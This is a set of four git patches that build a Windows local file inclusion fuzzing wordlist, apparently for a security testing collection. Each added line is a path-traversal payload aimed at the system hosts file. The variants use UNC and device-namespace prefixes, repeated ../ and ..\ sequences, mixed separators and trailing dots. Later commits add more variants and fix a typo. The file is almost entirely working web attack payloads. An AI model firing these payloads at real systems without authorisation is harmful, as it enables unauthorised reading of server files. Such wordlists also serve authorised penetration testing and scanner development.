From 3c78d52e15011db2d073fc7e864acb8d1c453d55 Mon Sep 17 00:00:00 2001 From: adeadfed Date: Tue, 5 Mar 2024 15:11:59 +0100 Subject: [PATCH 1/4] Add new dictionary for Windows LFI fuzzing --- Fuzzing/LFI/LFI-Windows-adeadfed.txt | 95 ++++++++++++++++++++++++++++ 1 file changed, 95 insertions(+) create mode 100644 Fuzzing/LFI/LFI-Windows-adeadfed.txt diff --git a/Fuzzing/LFI/LFI-Windows-adeadfed.txt b/Fuzzing/LFI/LFI-Windows-adeadfed.txt new file mode 100644 index 000000000..72c102e61 --- /dev/null +++ b/Fuzzing/LFI/LFI-Windows-adeadfed.txt @@ -0,0 +1,95 @@ +//./C:/Windows/system32/drivers/etc/hosts +\/./C:/Windows/system32/drivers/etc/hosts +/\./C:/Windows/system32/drivers/etc/hosts +\\?\C:\Windows\system32\drivers\etc\hosts +\/?\C:\Windows\system32\drivers\etc\hosts +/\?\C:\Windows\system32\drivers\etc\hosts +//?/C:/Windows/system32/drivers/etc/hosts +\/?/C:/Windows/system32/drivers/etc/hosts +/\?/C:/Windows/system32/drivers/etc/hosts +\\localhost\C$\Windows\system32\drivers\etc\hosts +\/localhost\C$\Windows\system32\drivers\etc\hosts +/\localhost\C$\Windows\system32\drivers\etc\hosts +//localhost/C$/Windows/system32/drivers/etc/hosts +\\127.0.0.1\C$\Windows\system32\drivers\etc\hosts +\/127.0.0.1\C$\Windows\system32\drivers\etc\hosts +/\127.0.0.1\C$\Windows\system32\drivers\etc\hosts +//127.0.0.1/C$/Windows/system32/drivers/etc/hosts +//::1/C$/Windows/system32/drivers/etc/hosts +\/::1/C$/Windows/system32/drivers/etc/hosts +/\::1/C$/Windows/system32/drivers/etc/hosts +\\::1\C$\Windows\system32\drivers\etc\hosts +C:..\..\..\..\..\..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts +C:..\..\..\..\..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts +C:..\..\..\..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts +C:..\..\..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts +C:..\..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts +C:..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts +C:..\..\..\..\..\..\Windows\system32\drivers\etc\hosts +C:..\..\..\..\..\Windows\system32\drivers\etc\hosts +C:..\..\..\..\Windows\system32\drivers\etc\hosts +C:..\..\..\Windows\system32\drivers\etc\hosts +C:..\..\Windows\system32\drivers\etc\hosts +C:..\Windows\system32\drivers\etc\hosts +C:../../../../../../../../../../../../Windows/system32/drivers/etc/hosts +C:../../../../../../../../../../../Windows/system32/drivers/etc/hosts +C:../../../../../../../../../../Windows/system32/drivers/etc/hosts +C:../../../../../../../../../Windows/system32/drivers/etc/hosts +C:../../../../../../../../Windows/system32/drivers/etc/hosts +C:../../../../../../../Windows/system32/drivers/etc/hosts +C:../../../../../../Windows/system32/drivers/etc/hosts +C:../../../../../Windows/system32/drivers/etc/hosts +C:../../../../Windows/system32/drivers/etc/hosts +C:../../../Windows/system32/drivers/etc/hosts +C:../../Windows/system32/drivers/etc/hosts +C:../Windows/system32/drivers/etc/hosts +..\..\..\..\..\..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts +..\..\..\..\..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts +..\..\..\..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts +..\..\..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts +..\..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts +..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts +..\..\..\..\..\..\Windows\system32\drivers\etc\hosts +..\..\..\..\..\Windows\system32\drivers\etc\hosts +..\..\..\..\Windows\system32\drivers\etc\hosts +..\..\..\Windows\system32\drivers\etc\hosts +..\..\Windows\system32\drivers\etc\hosts +..\Windows\system32\drivers\etc\hosts +../../../../../../../../../../../../Windows/system32/drivers/etc/hosts +../../../../../../../../../../../Windows/system32/drivers/etc/hosts +../../../../../../../../../../Windows/system32/drivers/etc/hosts +../../../../../../../../../Windows/system32/drivers/etc/hosts +../../../../../../../../Windows/system32/drivers/etc/hosts +../../../../../../../Windows/system32/drivers/etc/hosts +../../../../../../Windows/system32/drivers/etc/qhosts +../../../../../Windows/system32/drivers/etc/hosts +../../../../Windows/system32/drivers/etc/hosts +../../../Windows/system32/drivers/etc/hosts +../../Windows/system32/drivers/etc/hosts +../Windows/system32/drivers/etc/hosts +RANDOMDIR..\..\..\..\..\..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts +RANDOMDIR..\..\..\..\..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts +RANDOMDIR..\..\..\..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts +RANDOMDIR..\..\..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts +RANDOMDIR..\..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts +RANDOMDIR..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts +RANDOMDIR..\..\..\..\..\..\Windows\system32\drivers\etc\hosts +RANDOMDIR..\..\..\..\..\Windows\system32\drivers\etc\hosts +RANDOMDIR..\..\..\..\Windows\system32\drivers\etc\hosts +RANDOMDIR..\..\..\Windows\system32\drivers\etc\hosts +RANDOMDIR..\..\Windows\system32\drivers\etc\hosts +RANDOMDIR..\Windows\system32\drivers\etc\hosts +RANDOMDIR../../../../../../../../../../../../Windows/system32/drivers/etc/hosts +RANDOMDIR../../../../../../../../../../../Windows/system32/drivers/etc/hosts +RANDOMDIR../../../../../../../../../../Windows/system32/drivers/etc/hosts +RANDOMDIR../../../../../../../../../Windows/system32/drivers/etc/hosts +RANDOMDIR../../../../../../../../Windows/system32/drivers/etc/hosts +RANDOMDIR../../../../../../../Windows/system32/drivers/etc/hosts +RANDOMDIR../../../../../../Windows/system32/drivers/etc/hosts +RANDOMDIR../../../../../Windows/system32/drivers/etc/hosts +RANDOMDIR../../../../Windows/system32/drivers/etc/hosts +RANDOMDIR../../../Windows/system32/drivers/etc/hosts +RANDOMDIR../../Windows/system32/drivers/etc/hosts +RANDOMDIR../Windows/system32/drivers/etc/hosts +C:/Windows/system32/drivers/etc/hosts +C:\Windows\system32\drivers\etc\hosts \ No newline at end of file From d72aadd8ce61629a2a1c40f0f61b3daa500f70d8 Mon Sep 17 00:00:00 2001 From: adeadfed Date: Tue, 12 Mar 2024 21:04:56 +0100 Subject: [PATCH 2/4] add more valid windows paths --- Fuzzing/LFI/LFI-Windows-adeadfed.txt | 74 +++++++++++++++++++++++++++- 1 file changed, 73 insertions(+), 1 deletion(-) diff --git a/Fuzzing/LFI/LFI-Windows-adeadfed.txt b/Fuzzing/LFI/LFI-Windows-adeadfed.txt index 72c102e61..8743d4812 100644 --- a/Fuzzing/LFI/LFI-Windows-adeadfed.txt +++ b/Fuzzing/LFI/LFI-Windows-adeadfed.txt @@ -1,6 +1,16 @@ +\/127.0.0.1\C$/Windows///////\system32/drivers//////\etc/hosts....... //./C:/Windows/system32/drivers/etc/hosts \/./C:/Windows/system32/drivers/etc/hosts /\./C:/Windows/system32/drivers/etc/hosts +\\.\C:\Windows\system32\drivers\etc\hosts +\/.\C:\Windows\system32\drivers\etc\hosts +/\.\C:\Windows\system32\drivers\etc\hosts +//./C:/Windows/system32/drivers/etc/hosts. +\/./C:/Windows/system32/drivers/etc/hosts. +/\./C:/Windows/system32/drivers/etc/hosts. +\\.\C:\Windows\system32\drivers\etc\hosts. +\/.\C:\Windows\system32\drivers\etc\hosts. +/\.\C:\Windows\system32\drivers\etc\hosts. \\?\C:\Windows\system32\drivers\etc\hosts \/?\C:\Windows\system32\drivers\etc\hosts /\?\C:\Windows\system32\drivers\etc\hosts @@ -11,14 +21,38 @@ \/localhost\C$\Windows\system32\drivers\etc\hosts /\localhost\C$\Windows\system32\drivers\etc\hosts //localhost/C$/Windows/system32/drivers/etc/hosts +\/localhost/C$/Windows/system32/drivers/etc/hosts +/\localhost/C$/Windows/system32/drivers/etc/hosts +\\localhost\C$\Windows\system32\drivers\etc\hosts. +\/localhost\C$\Windows\system32\drivers\etc\hosts. +/\localhost\C$\Windows\system32\drivers\etc\hosts. +//localhost/C$/Windows/system32/drivers/etc/hosts. +\/localhost/C$/Windows/system32/drivers/etc/hosts. +/\localhost/C$/Windows/system32/drivers/etc/hosts. \\127.0.0.1\C$\Windows\system32\drivers\etc\hosts \/127.0.0.1\C$\Windows\system32\drivers\etc\hosts /\127.0.0.1\C$\Windows\system32\drivers\etc\hosts //127.0.0.1/C$/Windows/system32/drivers/etc/hosts +\/127.0.0.1/C$/Windows/system32/drivers/etc/hosts +/\127.0.0.1/C$/Windows/system32/drivers/etc/hosts +\\127.0.0.1\C$\Windows\system32\drivers\etc\hosts. +\/127.0.0.1\C$\Windows\system32\drivers\etc\hosts. +/\127.0.0.1\C$\Windows\system32\drivers\etc\hosts. +//127.0.0.1/C$/Windows/system32/drivers/etc/hosts. +\/127.0.0.1/C$/Windows/system32/drivers/etc/hosts. +/\127.0.0.1/C$/Windows/system32/drivers/etc/hosts. //::1/C$/Windows/system32/drivers/etc/hosts \/::1/C$/Windows/system32/drivers/etc/hosts /\::1/C$/Windows/system32/drivers/etc/hosts \\::1\C$\Windows\system32\drivers\etc\hosts +\/::1\C$\Windows\system32\drivers\etc\hosts +/\::1\C$\Windows\system32\drivers\etc\hosts +//::1/C$/Windows/system32/drivers/etc/hosts. +\/::1/C$/Windows/system32/drivers/etc/hosts. +/\::1/C$/Windows/system32/drivers/etc/hosts. +\\::1\C$\Windows\system32\drivers\etc\hosts. +\/::1\C$\Windows\system32\drivers\etc\hosts. +/\::1\C$\Windows\system32\drivers\etc\hosts. C:..\..\..\..\..\..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts C:..\..\..\..\..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts C:..\..\..\..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts @@ -55,6 +89,18 @@ C:../Windows/system32/drivers/etc/hosts ..\..\..\Windows\system32\drivers\etc\hosts ..\..\Windows\system32\drivers\etc\hosts ..\Windows\system32\drivers\etc\hosts +..\..\..\..\..\..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts. +..\..\..\..\..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts. +..\..\..\..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts. +..\..\..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts. +..\..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts. +..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts. +..\..\..\..\..\..\Windows\system32\drivers\etc\hosts. +..\..\..\..\..\Windows\system32\drivers\etc\hosts. +..\..\..\..\Windows\system32\drivers\etc\hosts. +..\..\..\Windows\system32\drivers\etc\hosts. +..\..\Windows\system32\drivers\etc\hosts. +..\Windows\system32\drivers\etc\hosts. ../../../../../../../../../../../../Windows/system32/drivers/etc/hosts ../../../../../../../../../../../Windows/system32/drivers/etc/hosts ../../../../../../../../../../Windows/system32/drivers/etc/hosts @@ -67,6 +113,30 @@ C:../Windows/system32/drivers/etc/hosts ../../../Windows/system32/drivers/etc/hosts ../../Windows/system32/drivers/etc/hosts ../Windows/system32/drivers/etc/hosts +../../../../../../../../../../../../Windows/system32/drivers/etc/hosts. +../../../../../../../../../../../Windows/system32/drivers/etc/hosts. +../../../../../../../../../../Windows/system32/drivers/etc/hosts. +../../../../../../../../../Windows/system32/drivers/etc/hosts. +../../../../../../../../Windows/system32/drivers/etc/hosts. +../../../../../../../Windows/system32/drivers/etc/hosts. +../../../../../../Windows/system32/drivers/etc/qhosts. +../../../../../Windows/system32/drivers/etc/hosts. +../../../../Windows/system32/drivers/etc/hosts. +../../../Windows/system32/drivers/etc/hosts. +../../Windows/system32/drivers/etc/hosts. +../Windows/system32/drivers/etc/hosts. +../..\../..\../..\../..\../..\../..\Windows/system32\drivers/etc\hosts +../..\../..\../..\../..\../..\..\Windows/system32\drivers/etc\hosts +../..\../..\../..\../..\../..\Windows/system32\drivers/etc\hosts +../..\../..\../..\../..\..\Windows/system32\drivers/etc\hosts +../..\../..\../..\../..\Windows/system32\drivers/etc\hosts +../..\../..\../..\..\Windows/system32\drivers/etc\hosts +../..\../..\../..\Windows/system32\drivers/etc\hosts +../..\../..\..\Windows/system32\drivers/etc\hosts +../..\../..\Windows/system32\drivers/etc\hosts +../..\..\Windows/system32\drivers/etc\hosts +../..\Windows/system32\drivers/etc\hosts +../\Windows/system32\drivers/etc\hosts RANDOMDIR..\..\..\..\..\..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts RANDOMDIR..\..\..\..\..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts RANDOMDIR..\..\..\..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts @@ -92,4 +162,6 @@ RANDOMDIR../../../Windows/system32/drivers/etc/hosts RANDOMDIR../../Windows/system32/drivers/etc/hosts RANDOMDIR../Windows/system32/drivers/etc/hosts C:/Windows/system32/drivers/etc/hosts -C:\Windows\system32\drivers\etc\hosts \ No newline at end of file +C:\Windows\system32\drivers\etc\hosts +C:/Windows/system32/drivers/etc/hosts. +C:\Windows\system32\drivers\etc\hosts. \ No newline at end of file From 6e4f0e08a86dfb9d4225b948638e04b839363ae0 Mon Sep 17 00:00:00 2001 From: Maksym Vatsyk <54282598+adeadfed@users.noreply.github.com> Date: Tue, 19 Mar 2024 15:52:52 +0100 Subject: [PATCH 3/4] Add more paths with alternating separators --- Fuzzing/LFI/LFI-Windows-adeadfed.txt | 52 ++++++++++++++++++++++++++-- 1 file changed, 50 insertions(+), 2 deletions(-) diff --git a/Fuzzing/LFI/LFI-Windows-adeadfed.txt b/Fuzzing/LFI/LFI-Windows-adeadfed.txt index 8743d4812..b49315da5 100644 --- a/Fuzzing/LFI/LFI-Windows-adeadfed.txt +++ b/Fuzzing/LFI/LFI-Windows-adeadfed.txt @@ -89,6 +89,18 @@ C:../Windows/system32/drivers/etc/hosts ..\..\..\Windows\system32\drivers\etc\hosts ..\..\Windows\system32\drivers\etc\hosts ..\Windows\system32\drivers\etc\hosts +..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\Windows\system32\drivers\etc\hosts +..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\Windows\system32\drivers\etc\hosts +..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\Windows\system32\drivers\etc\hosts +..\\..\\..\\..\\..\\..\\..\\..\\..\\Windows\system32\drivers\etc\hosts +..\\..\\..\\..\\..\\..\\..\\..\\Windows\system32\drivers\etc\hosts +..\\..\\..\\..\\..\\..\\..\\Windows\system32\drivers\etc\hosts +..\\..\\..\\..\\..\\..\\Windows\system32\drivers\etc\hosts +..\\..\\..\\..\\..\\Windows\system32\drivers\etc\hosts +..\\..\\..\\..\\Windows\system32\drivers\etc\hosts +..\\..\\..\\Windows\system32\drivers\etc\hosts +..\\..\\Windows\system32\drivers\etc\hosts +..\\Windows\system32\drivers\etc\hosts ..\..\..\..\..\..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts. ..\..\..\..\..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts. ..\..\..\..\..\..\..\..\..\..\Windows\system32\drivers\etc\hosts. @@ -107,12 +119,48 @@ C:../Windows/system32/drivers/etc/hosts ../../../../../../../../../Windows/system32/drivers/etc/hosts ../../../../../../../../Windows/system32/drivers/etc/hosts ../../../../../../../Windows/system32/drivers/etc/hosts -../../../../../../Windows/system32/drivers/etc/qhosts +../../../../../../Windows/system32/drivers/etc/hosts ../../../../../Windows/system32/drivers/etc/hosts ../../../../Windows/system32/drivers/etc/hosts ../../../Windows/system32/drivers/etc/hosts ../../Windows/system32/drivers/etc/hosts ../Windows/system32/drivers/etc/hosts +..//..//..//..//..//..//..//..//..//..//..//..//Windows/system32/drivers/etc/hosts +..//..//..//..//..//..//..//..//..//..//..//Windows/system32/drivers/etc/hosts +..//..//..//..//..//..//..//..//..//..//Windows/system32/drivers/etc/hosts +..//..//..//..//..//..//..//..//..//Windows/system32/drivers/etc/hosts +..//..//..//..//..//..//..//..//Windows/system32/drivers/etc/hosts +..//..//..//..//..//..//..//Windows/system32/drivers/etc/hosts +..//..//..//..//..//..//Windows/system32/drivers/etc/hosts +..//..//..//..//..//Windows/system32/drivers/etc/hosts +..//..//..//..//Windows/system32/drivers/etc/hosts +..//..//..//Windows/system32/drivers/etc/hosts +..//..//Windows/system32/drivers/etc/hosts +..//Windows/system32/drivers/etc/hosts +..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/Windows/system32/drivers/etc/hosts +..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/Windows/system32/drivers/etc/hosts +..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/Windows/system32/drivers/etc/hosts +..\/..\/..\/..\/..\/..\/..\/..\/..\/Windows/system32/drivers/etc/hosts +..\/..\/..\/..\/..\/..\/..\/..\/Windows/system32/drivers/etc/hosts +..\/..\/..\/..\/..\/..\/..\/Windows/system32/drivers/etc/hosts +..\/..\/..\/..\/..\/..\/Windows/system32/drivers/etc/hosts +..\/..\/..\/..\/..\/Windows/system32/drivers/etc/hosts +..\/..\/..\/..\/Windows/system32/drivers/etc/hosts +..\/..\/..\/Windows/system32/drivers/etc/hosts +..\/..\/Windows/system32/drivers/etc/hosts +..\/Windows/system32/drivers/etc/hosts +../\../\../\../\../\../\../\../\../\../\../\../\Windows/system32/drivers/etc/hosts +../\../\../\../\../\../\../\../\../\../\../\Windows/system32/drivers/etc/hosts +../\../\../\../\../\../\../\../\../\../\Windows/system32/drivers/etc/hosts +../\../\../\../\../\../\../\../\../\Windows/system32/drivers/etc/hosts +../\../\../\../\../\../\../\../\Windows/system32/drivers/etc/hosts +../\../\../\../\../\../\../\Windows/system32/drivers/etc/hosts +../\../\../\../\../\../\Windows/system32/drivers/etc/hosts +../\../\../\../\../\Windows/system32/drivers/etc/hosts +../\../\../\../\Windows/system32/drivers/etc/hosts +../\../\../\Windows/system32/drivers/etc/hosts +../\../\Windows/system32/drivers/etc/hosts +../\Windows/system32/drivers/etc/hosts ../../../../../../../../../../../../Windows/system32/drivers/etc/hosts. ../../../../../../../../../../../Windows/system32/drivers/etc/hosts. ../../../../../../../../../../Windows/system32/drivers/etc/hosts. @@ -164,4 +212,4 @@ RANDOMDIR../Windows/system32/drivers/etc/hosts C:/Windows/system32/drivers/etc/hosts C:\Windows\system32\drivers\etc\hosts C:/Windows/system32/drivers/etc/hosts. -C:\Windows\system32\drivers\etc\hosts. \ No newline at end of file +C:\Windows\system32\drivers\etc\hosts. From 4e153fbc566732aabb231708aa4c7fa276c34956 Mon Sep 17 00:00:00 2001 From: Maksym Vatsyk <54282598+adeadfed@users.noreply.github.com> Date: Tue, 19 Mar 2024 15:53:23 +0100 Subject: [PATCH 4/4] fix typo --- Fuzzing/LFI/LFI-Windows-adeadfed.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Fuzzing/LFI/LFI-Windows-adeadfed.txt b/Fuzzing/LFI/LFI-Windows-adeadfed.txt index b49315da5..ab7563d1c 100644 --- a/Fuzzing/LFI/LFI-Windows-adeadfed.txt +++ b/Fuzzing/LFI/LFI-Windows-adeadfed.txt @@ -167,7 +167,7 @@ C:../Windows/system32/drivers/etc/hosts ../../../../../../../../../Windows/system32/drivers/etc/hosts. ../../../../../../../../Windows/system32/drivers/etc/hosts. ../../../../../../../Windows/system32/drivers/etc/hosts. -../../../../../../Windows/system32/drivers/etc/qhosts. +../../../../../../Windows/system32/drivers/etc/hosts. ../../../../../Windows/system32/drivers/etc/hosts. ../../../../Windows/system32/drivers/etc/hosts. ../../../Windows/system32/drivers/etc/hosts.